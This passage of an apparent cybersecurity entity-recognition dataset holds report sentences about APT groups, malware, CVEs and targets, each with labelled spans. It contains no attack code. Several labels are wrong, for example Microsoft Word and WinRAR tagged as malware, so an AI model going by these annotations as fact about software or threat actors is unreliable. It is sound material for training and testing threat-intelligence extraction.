The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio .", "spans": {"Malware: malicious documents": [[29, 48]], "Vulnerability: CVE-2017-0199": [[60, 73]], "Indicator: Android version": [[123, 138]]}, "info": {"id": "cyberner_stix_valid_000948", "source": "cyberner_stix_valid"}} {"text": "Low-volume campaigns distributed Dridex during much of 2015 Moderate volumes of Dridex appeared from the end of 2015 through February 2016 ; it is worth noting that these “ moderate volume ” campaigns were , at the time , the largest campaigns ever observed .", "spans": {"Malware: Dridex": [[33, 39], [80, 86]]}, "info": {"id": "cyberner_stix_valid_000949", "source": "cyberner_stix_valid"}} {"text": "the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated . In this campaign , the attackers experimented with publicly available tooling for attack operations .", "spans": {"Vulnerability: CVE-2013-5065": [[43, 56]], "Vulnerability: EoP exploit": [[57, 68]], "Malware: publicly available tooling": [[145, 171]]}, "info": {"id": "cyberner_stix_valid_000950", "source": "cyberner_stix_valid"}} {"text": "file Fingerprint the system and check the following registry values : HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid should not be “ 6ba1d002-21ed-4dbe-afb5-08cf8b81ca32 ” HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\DigitalProductId should not be “ 55274-649-6478953-23109 ” , “ A22-00001 ” , or “ 47220 ” HARDWARE\\Description\\System\\SystemBiosDate should not contain “ 01/02/03 ” Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents . The complexity of the shellcode and loaders shows the group continues to invest heavily in development of bespoke tooling . 
Mandiant directly observed one ( 1 ) variant of STRATOFEAR as a Mach - O executable compiled for ARM64 systems that contained a self - signed certificate with a particular Common Name ( CN ) .", "spans": {"Organization: foreign corporations": [[469, 489]], "Organization: foreign governments": [[520, 539]], "Organization: journalists": [[542, 553]], "Organization: dissidents": [[571, 581]], "System: ARM64 systems": [[805, 818]]}, "info": {"id": "cyberner_stix_valid_000952", "source": "cyberner_stix_valid"}} {"text": "] 230 [ . The Komplex Trojan revealed a design similar to Sofacy 's Carberp variant Trojan , which we believe may have been done in order to handle compromised Windows and OS X systems using the same C2 server application with relative ease . The enumerated methods are stored , then a for loop looks first for the method named DownloadString ( highlighted in blue ) . NoEscape is a new ransomware which has been doing the rounds in underground forums since May 2023 .", "spans": {"Malware: NoEscape": [[369, 377]]}, "info": {"id": "cyberner_stix_valid_000953", "source": "cyberner_stix_valid"}} {"text": "Fxmsp specializes in breaching highly secure protected networks to access private corporate and government information . BRONZE UNION actors leveraged initial web shell access on Internet-facing systems to conduct internal reconnaissance .", "spans": {}, "info": {"id": "cyberner_stix_valid_000954", "source": "cyberner_stix_valid"}} {"text": "To avoid confusion however , we have decided to continue referring to the loader as the “ MiniDuke loader ” .", "spans": {"Malware: MiniDuke": [[90, 98]]}, "info": {"id": "cyberner_stix_valid_000955", "source": "cyberner_stix_valid"}} {"text": "Note , however , that based on the leak mail from a customer inquiry , Hacking Team was in the process of developing exploits for Android 5.0 Lollipop . Against targets in the CIS countries , the Cobalt also used their own infrastructure , which included rented dedicated servers . 
In the example below , The hackers behind the campaign have been identified as Tortoiseshell , which is believed to work on behalf of the Iranian government .", "spans": {"Organization: Hacking Team": [[71, 83]], "System: Android 5.0 Lollipop": [[130, 150]]}, "info": {"id": "cyberner_stix_valid_000956", "source": "cyberner_stix_valid"}} {"text": "The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . Bookworm has little malicious functionality built-in , with its only core ability involving stealing keystrokes and clipboard contents .", "spans": {"Malware: GRIFFON": [[35, 42]], "Malware: Bookworm": [[202, 210]]}, "info": {"id": "cyberner_stix_valid_000957", "source": "cyberner_stix_valid"}} {"text": "The first class , colloquially known as \" wipers \" , is a class of malware that has the primary intent of destroying data on a victim 's machine . Also , Bookworm uses a combination of encryption and compression algorithms to obfuscate the traffic between the system and C2 server .", "spans": {"Malware: Bookworm": [[154, 162]]}, "info": {"id": "cyberner_stix_valid_000958", "source": "cyberner_stix_valid"}} {"text": "As security controls have improved , DLL side loading has evolved to load a payload stored in a different directory or from a registry value .", "spans": {}, "info": {"id": "cyberner_stix_valid_000959", "source": "cyberner_stix_valid"}} {"text": "During our research we also found a component called KPWS that turned out to be another downloader for Slingshot components . 
The most popular targets of SneakyPastes are embassies , government entities , education , media outlets , journalists , activists , political parties or personnel , healthcare and banking .", "spans": {"Organization: embassies": [[171, 180]], "Organization: government entities": [[183, 202]], "Organization: education": [[205, 214]], "Organization: media outlets": [[217, 230]], "Organization: activists": [[247, 256]], "Organization: personnel": [[280, 289]], "Organization: healthcare": [[292, 302]], "Organization: banking": [[307, 314]]}, "info": {"id": "cyberner_stix_valid_000960", "source": "cyberner_stix_valid"}} {"text": "SMS grabbing : EventBot has the ability to parse SMS messages by using the targeted device ’ s SDK version to parse them correctly . According to ClearSky , the suspected Lazarus operatives looked to leverage a vulnerability in outdated WinRAR file-archiving software that hackers have been exploiting since it was disclosed last month . Additionally , there is evidence to suggest APT33 targeted Saudi Arabia .", "spans": {"Malware: EventBot": [[15, 23]], "Organization: ClearSky": [[146, 154]], "Malware: WinRAR": [[237, 243]]}, "info": {"id": "cyberner_stix_valid_000961", "source": "cyberner_stix_valid"}} {"text": "The target list and bank specific fake login pages can be dynamically updated via their C2 panel ( dashboard back-end ) which significantly increases the adaptability and scalability of this attack . Despite the fact that the Changing Information Technology Inc. certificate was revoked on July 4 , 2017 , the BlackTech group is still using it to sign their malicious tools . We have written a simple C++ ZxShell Server that implements the communication and the handshake for the version 3.10 and 3.20 of the ZxShell DLL . 
As Google Analytics is allowed in the CSP configuration of many major sites , this demo shows how an attacker can bypass this security protection and steal data .", "spans": {"Malware: ZxShell": [[405, 412], [509, 516]], "Organization: Google Analytics": [[526, 542]], "Organization: CSP": [[561, 564]]}, "info": {"id": "cyberner_stix_valid_000962", "source": "cyberner_stix_valid"}} {"text": "The web shell files appeared to be installed during the timeframe that BRONZE PRESIDENT was active on the system .", "spans": {}, "info": {"id": "cyberner_stix_valid_000963", "source": "cyberner_stix_valid"}} {"text": "Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . PittyTiger has also been seen using the Heartbleed vulnerability in order to directly get valid credentials .", "spans": {"Vulnerability: CVE-2012-0158": [[79, 92]], "Malware: Microsoft Word": [[104, 118]], "Vulnerability: Heartbleed vulnerability": [[161, 185]]}, "info": {"id": "cyberner_stix_valid_000964", "source": "cyberner_stix_valid"}} {"text": "In this particular case , the bot abuses the accessibility service privilege to obtain the package name of the foreground application and determine whether or not to show a phishing overlay window , as shown in the following code snippet : Targets Some examples of phishing overlays are shown below . A new type of backdoor called AdroMut and a new malware called FlowerPippi were also found coming from SectorJ04 . BRONZE BUTLER has used a broad range of publicly available ( Mimikatz and gsecdump ) and proprietary ( Daserf and Datper ) tools .", "spans": {"Malware: Mimikatz": [[477, 485]], "Malware: gsecdump": [[490, 498]], "Malware: Daserf": [[519, 525]], "Malware: Datper": [[530, 536]]}, "info": {"id": "cyberner_stix_valid_000965", "source": "cyberner_stix_valid"}} {"text": "The malware starts communicating with the C&C server by sending basic information about the infected machine . 
One of its file stealers , swissknife2 , abuses a cloud storage service as a repository of exfiltrated files .", "spans": {"Malware: malware": [[4, 11]], "Malware: swissknife2": [[138, 149]]}, "info": {"id": "cyberner_stix_valid_000966", "source": "cyberner_stix_valid"}} {"text": "This business unit and the eSurv software and brand was sold from Connexxa S.R.L . In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company . We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro as MuddyWater ) , an Iran-nexus actor that has been active since at least May 2017 .", "spans": {"Organization: eSurv": [[27, 32]], "Organization: Connexxa S.R.L .": [[66, 82]], "Vulnerability: Carbanak": [[112, 120]], "Organization: financial institution": [[151, 172]], "Organization: Palo Alto Networks": [[325, 343]], "Organization: Trend Micro": [[348, 359]]}, "info": {"id": "cyberner_stix_valid_000968", "source": "cyberner_stix_valid"}} {"text": "Looking under the hood we see the VBA code that builds the PowerShell B-FILE S-TOOL command and launches it but something seemed off .", "spans": {}, "info": {"id": "cyberner_stix_valid_000969", "source": "cyberner_stix_valid"}} {"text": "The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio . After the source codes of their tools became public in 2016 , the name Buhtrap was used for the financial Trojan .", "spans": {"Malware: Android version": [[4, 19]], "Malware: financial Trojan": [[218, 234]]}, "info": {"id": "cyberner_stix_valid_000970", "source": "cyberner_stix_valid"}} {"text": "After all network derived IPs have been processed , the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host . 
Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection .", "spans": {"Malware: malware": [[56, 63]], "Malware: PingCastle": [[118, 128]], "Malware: EternalBlue": [[133, 144]], "Indicator: Canhadr/Ndriver": [[199, 214]]}, "info": {"id": "cyberner_stix_valid_000971", "source": "cyberner_stix_valid"}} {"text": "Sanitize and validate input to ensure that it is properly typed and does not contain escaped code .", "spans": {}, "info": {"id": "cyberner_stix_valid_000972", "source": "cyberner_stix_valid"}} {"text": "During our tests the spyware was upgraded to the second stage on our test device immediately after the first check-ins . However , they later continued by making modifications to the Excel document just prior to the attack on August 26th . ImportError : Unknown magic number 227 in final2 . Therefore can be no leakage on our part .", "spans": {}, "info": {"id": "cyberner_stix_valid_000973", "source": "cyberner_stix_valid"}} {"text": "Behind the scenes , there are number of process occurring simultaneously . makeself.sh is a small shell script that generates a self-extractable compressed tar archive from a directory . 
For context , embedded Winnti campaign designators have ranged from target names , geographic areas , industry , and profanity .", "spans": {"Malware: makeself.sh": [[75, 86]], "Malware: shell script": [[98, 110]], "Malware: Winnti": [[210, 216]]}, "info": {"id": "cyberner_stix_valid_000974", "source": "cyberner_stix_valid"}} {"text": "The Trojan sends an email to sahro.bella7@post.cz with i.ini as the attachment , S_inf within the body and a subject with a unique system identifier via SMTPS from one of the following accounts : Bishtr.cam47 , Lobrek.chizh , Cervot.woprov .", "spans": {"Malware: Trojan": [[4, 10]], "Indicator: sahro.bella7@post.cz": [[29, 49]], "Indicator: i.ini": [[55, 60]], "Indicator: Bishtr.cam47": [[196, 208]], "Indicator: Lobrek.chizh": [[211, 223]], "Indicator: Cervot.woprov": [[226, 239]]}, "info": {"id": "cyberner_stix_valid_000975", "source": "cyberner_stix_valid"}} {"text": "This sample was also found to be deployed using the CVE-2012-0158 vulnerability . In the past they used Adobe Gh0st , Poison Ivy and Torn RAT malware as their primary attack vector is sphere phishing .", "spans": {"Vulnerability: CVE-2012-0158": [[52, 65]], "Malware: Adobe Gh0st": [[104, 115]], "Malware: Poison Ivy": [[118, 128]], "Malware: Torn RAT malware": [[133, 149]]}, "info": {"id": "cyberner_stix_valid_000976", "source": "cyberner_stix_valid"}} {"text": "TG-4127 created 150 short links targeting this group .", "spans": {}, "info": {"id": "cyberner_stix_valid_000977", "source": "cyberner_stix_valid"}} {"text": "] 230 [ . This assertion of time zone is also supported by timestamps found in many GeminiDuke samples , which similarly suggest the group work in the Moscow Standard Time timezone , as further detailed in the section on the technical analysis of GeminiDuke . The base64 encoded PE file that can be seen in line 2760 of the image above is a GandCrab Variant . 
Charming Kitten members , claiming to be a senior teaching and research fellow at SOAS university in London sent targeted emails to a select number of victims from fewer than 10 organizations in the US and UK , inviting them to an online conference called The US Security Challenges in the Middle East .", "spans": {"Malware: GandCrab": [[341, 349]]}, "info": {"id": "cyberner_stix_valid_000978", "source": "cyberner_stix_valid"}} {"text": "Most of them are almost harmless — all they did until recently was injecting tons of ads and downloading others of their kind . Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . In recent attacks they set up a fake VPN Web Portal and targeted at least five Israeli IT vendors , several financial institutes , and the Israeli Post Office .", "spans": {"Organization: Unit 42": [[128, 135]], "Vulnerability: CVE-2012-0158": [[192, 205]], "Malware: VPN Web Portal": [[275, 289]], "Organization: IT vendors": [[325, 335]], "Organization: financial institutes": [[346, 366]], "Organization: Israeli Post Office": [[377, 396]]}, "info": {"id": "cyberner_stix_valid_000979", "source": "cyberner_stix_valid"}} {"text": "On September 13 , WADA confirmed that APT28 had compromised its networks and accessed athlete medical data .", "spans": {"Organization: WADA": [[18, 22]]}, "info": {"id": "cyberner_stix_valid_000980", "source": "cyberner_stix_valid"}} {"text": "+86.01078456689 Fax . PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach . 
Unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals .", "spans": {"Vulnerability: Flash vulnerability": [[130, 149]], "Vulnerability: CVE-2015-5119": [[152, 165]], "Organization: economic": [[303, 311]]}, "info": {"id": "cyberner_stix_valid_000981", "source": "cyberner_stix_valid"}} {"text": "In a report released on January 7 2017 , the U.S. Directorate of National Intelligence described this activity as an “ influence campaign. ” This influence campaign - a combination of network compromises and subsequent data leaks - aligns closely with the Russian military ’s publicly stated intentions and capabilities .", "spans": {"Organization: Directorate of National Intelligence": [[50, 86]]}, "info": {"id": "cyberner_stix_valid_000982", "source": "cyberner_stix_valid"}} {"text": "9b2fd7189395b2f34781b499f5cae10ec86aa7ab373fbdc2a14ec4597d4799ba ac216d502233ca0fe51ac2bb64cfaf553d906dc19b7da4c023fec39b000bc0d7 b1ccb5618925c8f0dda8d13efe4a1e1a93d1ceed9e26ec4a388229a28d1f8d5b ba4beb97f5d4ba33162f769f43ec8e7d1ae501acdade792a4a577cd6449e1a84 The two malware families themselves are also very similar , and therefore we think that the shared technique is an indication of a single developer , or development company , behind both CONFUCIUS_A and CONFUCIUS_B . Within a year APT40 was observed masquerading as a UUV manufacturer , and targeting universities engaged in naval research .", "spans": {"Organization: development company": [[413, 432]], "Malware: CONFUCIUS_A": [[447, 458]], "Malware: CONFUCIUS_B": [[463, 474]], "Organization: universities": [[561, 573]]}, "info": {"id": "cyberner_stix_valid_000983", "source": "cyberner_stix_valid"}} {"text": "The app that resulted in the largest number of affected users was the click fraud version , which was installed over 170,000 times at its peak in February 2018 . 
PassCV continues to maintain a heavy reliance on obfuscated and signed versions of older RATs like ZxShell and Ghost RAT , which have remained a favorite of the wider Chinese criminal community since their initial public release . Various artifacts from the initial phases of the incident provided strong indications of the existence of this particular threat group within the client's infrastructure . According to HTTP headers of the server , the applet was uploaded on February 11 , 2013 , one month after the Metasploit code was published and two days before Oracle issued a security alert regarding the vulnerability .", "spans": {"System: HTTP headers of the server": [[578, 604]], "Organization: Oracle": [[725, 731]], "Vulnerability: vulnerability": [[770, 783]]}, "info": {"id": "cyberner_stix_valid_000984", "source": "cyberner_stix_valid"}} {"text": "It minimizes the risk of overexposure by specifically targeting Arabic speakers .", "spans": {}, "info": {"id": "cyberner_stix_valid_000985", "source": "cyberner_stix_valid"}} {"text": "This submitter has thousands of other submissions in VirusTotal , however , it is the only one that continues to submit EventBot samples via the VirusTotal API . This post was our first analysis of the first Panda Banker campaign that we’ve seen to target financial institutions in Japan . 
An Iranian hacking group formerly named Ajax Security ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": {"Malware: EventBot": [[120, 128]], "Malware: Panda Banker": [[208, 220]], "Organization: financial institutions": [[256, 278]], "Organization: CrowdStrike": [[378, 389]], "Organization: dissidents": [[444, 454]]}, "info": {"id": "cyberner_stix_valid_000986", "source": "cyberner_stix_valid"}} {"text": "On April 22 , 2015 , Suckfly exploited a vulnerability on the targeted employee 's operating system ( Windows ) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack .", "spans": {"System: Windows": [[102, 109]], "Malware: Nidiran": [[190, 197]]}, "info": {"id": "cyberner_stix_valid_000987", "source": "cyberner_stix_valid"}} {"text": "Initially some particular words from the decompiled classes.dex of Exodus Two sent us in the right direction . Proofpoint is tracking this attacker , believed to operate out of China , as TA459 . The macro code embedded in the document is rather simple and is not obfuscated . Many of the individuals work at organizations related to financial services , cryptocurrency , blockchain , web3 and related entities .", "spans": {"Malware: Exodus": [[67, 73]], "Organization: Proofpoint": [[111, 121]]}, "info": {"id": "cyberner_stix_valid_000988", "source": "cyberner_stix_valid"}} {"text": "After manual launch , it shows a fake welcome notification to the user : Dear Customer , we ’ re updating your configuration and it will be ready as soon as possible . The January 2017 report followed up on other private reports published on the group’s BeEF-related activity in 2015 and 2016 . 
The group has been observed utilizing TRITON , a malware framework designed to manipulate industrial safety systems .", "spans": {"Malware: TRITON": [[333, 339]]}, "info": {"id": "cyberner_stix_valid_000989", "source": "cyberner_stix_valid"}} {"text": "Ginp embeds the following set of features , allowing it to remain under the radar and successfully perform attacks : Overlaying : Dynamic ( local overlays obtained from the C2 ) SMS harvesting : SMS listing SMS harvesting : SMS forwarding Contact list collection Application listing Overlaying : Targets list update SMS : Sending Calls : Call forwarding C2 Resilience : Auxiliary C2 list Self-protection : Hiding the App icon Self-protection : Preventing removal Self-protection : Emulation-detection Update 'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS (JukeBox) and Linux (DanceFloor) . The web server was also a C2 server for another threat , Minzen ( a.k.a , XXMM , Wali , or ShadowWali ) .", "spans": {"Malware: Ginp": [[0, 4]], "Malware: 'Improvise'": [[508, 519]], "Malware: Minzen": [[810, 816]], "Malware: XXMM": [[827, 831]], "Malware: Wali": [[834, 838]], "Malware: ShadowWali": [[844, 854]]}, "info": {"id": "cyberner_stix_valid_000990", "source": "cyberner_stix_valid"}} {"text": "All the observed landing pages mimic the mobile operators ’ web pages through their domain name and web page content as well . According to Cheetah Mobile’s follow-up investigation , fraudulent behaviors came from two 3rd party SDKs Batmobi , Duapps integrated inside Cheetah SDK . 
The group has targeted a variety of victims including but not limited to media outlets , high-tech companies , and multiple governments .", "spans": {"Malware: Batmobi": [[233, 240]], "Malware: Duapps": [[243, 249]], "Malware: Cheetah SDK": [[268, 279]], "Organization: media outlets": [[355, 368]], "Organization: high-tech companies": [[371, 390]], "Organization: multiple governments": [[397, 417]]}, "info": {"id": "cyberner_stix_valid_000991", "source": "cyberner_stix_valid"}} {"text": "The sample we analyzed is most likely forked from open source quasar 1.2.0.0 .", "spans": {"Malware: quasar 1.2.0.0": [[62, 76]]}, "info": {"id": "cyberner_stix_valid_000992", "source": "cyberner_stix_valid"}} {"text": "Throughout 2017 we observed this threat actor actively attempting to compromise victims with various malware payloads .", "spans": {}, "info": {"id": "cyberner_stix_valid_000993", "source": "cyberner_stix_valid"}} {"text": "The Cybereason Nocturnus team will continue to monitor EventBot ’ s development . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . APT10 withdrew from direct targeting using Poison Ivy in 2013 and conducted its first known retooling operation , upgrading its capabilities and replatforming to use PlugX .", "spans": {"Organization: Cybereason Nocturnus": [[4, 24]], "Malware: EventBot": [[55, 63]], "Organization: government officials": [[110, 130]], "Malware: malicious Microsoft Word document": [[172, 205]], "Vulnerability: CVE-2012-0158": [[225, 238]], "Malware: Poison Ivy": [[326, 336]], "Malware: PlugX": [[449, 454]]}, "info": {"id": "cyberner_stix_valid_000994", "source": "cyberner_stix_valid"}} {"text": "Apart from collecting the above data , the spyware monitors users ’ phone calls , records them , and saves the recorded file on the device . 
We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester . This downloader , seen in past FIN7 campaigns , downloads a one-byte XOR encrypted ( eg. with the key equal to 0x50 or 0x51 ) piece of meterpreter shellcode to execute . Usually , they ’d have to hope a successful attack leads to a ransom payment or some sort of other financial windfall .", "spans": {"Malware: Bluetooth device harvester": [[230, 256]]}, "info": {"id": "cyberner_stix_valid_000995", "source": "cyberner_stix_valid"}} {"text": "This is then returned as a string to PowerShell , which calls invoke-expression ( iex ) on it , indicating that the expected payload is PowerShell .", "spans": {}, "info": {"id": "cyberner_stix_valid_000996", "source": "cyberner_stix_valid"}} {"text": "Mandiant disclosed these vulnerabilities to Lenovo in May of 2016 . In addition to focused targeting of the private sector with ties to Vietnam , APT32 has also targeted foreign governments , as well as Vietnamese dissidents and journalists since at least 2013 .", "spans": {"Organization: Mandiant": [[0, 8]], "Organization: governments": [[178, 189]], "Organization: dissidents": [[214, 224]], "Organization: journalists": [[229, 240]]}, "info": {"id": "cyberner_stix_valid_000997", "source": "cyberner_stix_valid"}} {"text": "Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies . 
In addition , a current ANY.RUN playback of our observed Elise infection is also available .", "spans": {"Malware: Margarita": [[33, 42]], "Indicator: ANY.RUN": [[186, 193]], "Indicator: Elise": [[219, 224]]}, "info": {"id": "cyberner_stix_valid_000998", "source": "cyberner_stix_valid"}} {"text": "Originally targeting Western European banks , it has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns : PLEAD , Shrouded Crossbow , and of late , Waterbear .", "spans": {"Organization: banks": [[38, 43]]}, "info": {"id": "cyberner_stix_valid_000999", "source": "cyberner_stix_valid"}} {"text": "Just like the old-school mail worms that used the victim 's address book to select the next victims , this banking trojan 's activation cycle includes the exfiltration of the victim 's address book . APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB )1 and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs . OceanLotus : d78a83e9bf4511c33eaab9a33ebf7ccc16e104301a7567dd77ac3294474efced Payload PNG ( loader #2 ) . 
TeamTNT has used an IRC bot for C2 communications.[13 ] Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level .", "spans": {"System: address book": [[60, 72]], "Organization: technology": [[351, 361]], "Organization: telecommunications sector": [[366, 391]], "Organization: MSPs": [[505, 509]], "Indicator: d78a83e9bf4511c33eaab9a33ebf7ccc16e104301a7567dd77ac3294474efced": [[525, 589]], "System: C2": [[650, 652]]}, "info": {"id": "cyberner_stix_valid_001000", "source": "cyberner_stix_valid"}} {"text": "\" PittyTiger \" is a mutex used by the malware . Since that time , the group attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida .", "spans": {}, "info": {"id": "cyberner_stix_valid_001001", "source": "cyberner_stix_valid"}} {"text": "In the case of FinFisher , however , we could not find a good existing interactive disassembler ( IDA ) plugin that can normalize the code flow . The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan . The malware files simply have lots of clean files appended to them . To understand the context of a computing interaction between servers , tools , and users , we need to analyze the endtoend process .", "spans": {"Malware: FinFisher": [[15, 24]], "Organization: individual": [[168, 178]], "System: servers": [[466, 473]], "Organization: users": [[488, 493]]}, "info": {"id": "cyberner_stix_valid_001002", "source": "cyberner_stix_valid"}} {"text": "Machine learning module indicates continuous evolution As mentioned , this ransomware is the latest variant of a malware family that has undergone several stages of evolution . 
FireEye gained visibility into one of 23 known command-and-control ( CnC ) servers operated by the Ke3chang actor for about one week . however TAU expects not only APT10 but also other threat actors will start to use them . The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": {"Organization: FireEye": [[177, 184]], "Organization: TAU": [[320, 323]], "Organization: institutions in the legal and governmental fields .": [[478, 529]]}, "info": {"id": "cyberner_stix_valid_001003", "source": "cyberner_stix_valid"}} {"text": "We believe that these industries have also been targeted as part of a larger supply-chain attack in order for Orangeworm to get access to their intended victims related to healthcare .", "spans": {}, "info": {"id": "dnrti_valid_000000", "source": "dnrti_valid"}} {"text": "Orangeworm 's secondary targets include Manufacturing , Information Technology , Agriculture , and Logistics .", "spans": {}, "info": {"id": "dnrti_valid_000001", "source": "dnrti_valid"}} {"text": "While these industries may appear to be unrelated , we found them to have multiple links to healthcare , such as large manufacturers that produce medical imaging devices sold directly into healthcare firms , IT organizations that provide support services to medical clinics , and logistical organizations that deliver healthcare products .", "spans": {"Organization: healthcare firms": [[189, 205]], "Organization: IT organizations": [[208, 224]], "Organization: medical clinics": [[258, 273]], "Organization: logistical organizations": [[280, 304]]}, "info": {"id": "dnrti_valid_000002", "source": "dnrti_valid"}} {"text": "Once Orangeworm has infiltrated a victim 's network , they deploy Trojan.Kwampirs , a backdoor Trojan that provides the attackers with remote access to the compromised computer .", "spans": {}, "info": {"id": "dnrti_valid_000003", "source": "dnrti_valid"}} {"text": "Patchwork targets were 
chosen worldwide with a focus on personnel working on military and political assignments , and specifically those working on issues relating to Southeast Asia and the South China Sea .", "spans": {"Organization: personnel": [[56, 65]]}, "info": {"id": "dnrti_valid_000004", "source": "dnrti_valid"}} {"text": "Kwampirs uses a fairly aggressive means to propagate itself once inside a victim 's network by copying itself over network shares .", "spans": {}, "info": {"id": "dnrti_valid_000005", "source": "dnrti_valid"}} {"text": "In mid-August , the OilRig threat group sent what appeared to be a highly targeted phishing email to a high-ranking office in a Middle Eastern nation .", "spans": {}, "info": {"id": "dnrti_valid_000006", "source": "dnrti_valid"}} {"text": "Patchwork 's attack was detected as part of a spear phishing against a government organization in Europe in late May 2016 .", "spans": {"Organization: government organization": [[71, 94]]}, "info": {"id": "dnrti_valid_000007", "source": "dnrti_valid"}} {"text": "The attack was detected as part of a spear phishing against a government organization in Europe in late May 2016 .", "spans": {"Organization: government organization": [[62, 85]]}, "info": {"id": "dnrti_valid_000008", "source": "dnrti_valid"}} {"text": "The Patchwork attack group has been targeting more than just government-associated organizations .", "spans": {"Organization: government-associated organizations": [[61, 96]]}, "info": {"id": "dnrti_valid_000009", "source": "dnrti_valid"}} {"text": "Symantec has been actively monitoring Patchwork , also known as Dropping Elephant , which uses Chinese-themed content as bait to compromise its targets ' networks .", "spans": {"Organization: Symantec": [[0, 8]]}, "info": {"id": "dnrti_valid_000010", "source": "dnrti_valid"}} {"text": "Two security companies , Cymmetria and Kaspersky , each recently released reports on the campaign , most of which are in line with our observations .", "spans": 
{"Organization: Kaspersky": [[39, 48]]}, "info": {"id": "dnrti_valid_000011", "source": "dnrti_valid"}} {"text": "Symantec Security Response has been actively monitoring Patchwork , also known as Dropping Elephant , which uses Chinese-themed content as bait to compromise its targets ' networks .", "spans": {"Organization: Symantec Security Response": [[0, 26]]}, "info": {"id": "dnrti_valid_000012", "source": "dnrti_valid"}} {"text": "While Orangeworm has impacted only a small set of victims in 2016 and 2017 according to Symantec , we have seen infections in multiple countries due to the nature of the victims operating large international corporations .", "spans": {"Organization: Symantec": [[88, 96]]}, "info": {"id": "dnrti_valid_000013", "source": "dnrti_valid"}} {"text": "Although approximately half of the attacks focus on the US , other targeted regions include China , Japan , Southeast Asia , and the United Kingdom .", "spans": {}, "info": {"id": "dnrti_valid_000014", "source": "dnrti_valid"}} {"text": "While Orangeworm has impacted only a small set of victims in 2016 and 2017 according to Symantec telemetry , we have seen infections in multiple countries due to the nature of the victims operating large international corporations .", "spans": {"Organization: Symantec": [[88, 96]]}, "info": {"id": "dnrti_valid_000015", "source": "dnrti_valid"}} {"text": "Our first observation of an attempted attack related to this campaign dates back to November 2015 , although Symantec telemetry data indicates that the campaign may have already existed in early 2015 or perhaps even earlier .", "spans": {"Organization: Symantec": [[109, 117]]}, "info": {"id": "dnrti_valid_000016", "source": "dnrti_valid"}} {"text": "Should a user enable this content , Gallmaker is then able to use the DDE protocol to remotely execute commands in memory on the victima 's system .", "spans": {}, "info": {"id": "dnrti_valid_000017", "source": "dnrti_valid"}} {"text": "While both back door Trojans 
wait for commands from the threat actor , they can search for files and upload them to the specified server once activated .", "spans": {}, "info": {"id": "dnrti_valid_000018", "source": "dnrti_valid"}} {"text": "Patchwork ( also known as Dropping Elephant ) is a cyberespionage group whose targets included diplomatic and government agencies as well as businesses .", "spans": {"Organization: diplomatic": [[95, 105]], "Organization: government agencies": [[110, 129]]}, "info": {"id": "dnrti_valid_000019", "source": "dnrti_valid"}} {"text": "Patchwork is known for rehashing off-therack tools and malware for its own campaigns .", "spans": {}, "info": {"id": "dnrti_valid_000020", "source": "dnrti_valid"}} {"text": "They also included Dynamic Data Exchange ( DDE ) and Windows Script Component ( SCT ) abuse to their tactics , as well as started exploiting recently reported vulnerabilities .", "spans": {}, "info": {"id": "dnrti_valid_000021", "source": "dnrti_valid"}} {"text": "These socially engineered emails contain web links of weaponized documents containing exploits or macros .", "spans": {}, "info": {"id": "dnrti_valid_000022", "source": "dnrti_valid"}} {"text": "It contains an additional meta tag at the end of the web page source code , \" refreshing \" ( redirecting ) the site visitor to the weaponized document .", "spans": {}, "info": {"id": "dnrti_valid_000023", "source": "dnrti_valid"}} {"text": "It 's probable that Patchwork uses this package to facilitate server installation when using a Windows environment .", "spans": {}, "info": {"id": "dnrti_valid_000024", "source": "dnrti_valid"}} {"text": "In March and April 2018 , Volexity identified multiple spear phishing campaigns attributed to Patchwork , an Indian APT group also known as Dropping Elephant .", "spans": {"Organization: Volexity": [[26, 34]]}, "info": {"id": "dnrti_valid_000025", "source": "dnrti_valid"}} {"text": "This increase in threat activity was consistent with other observations documented over 
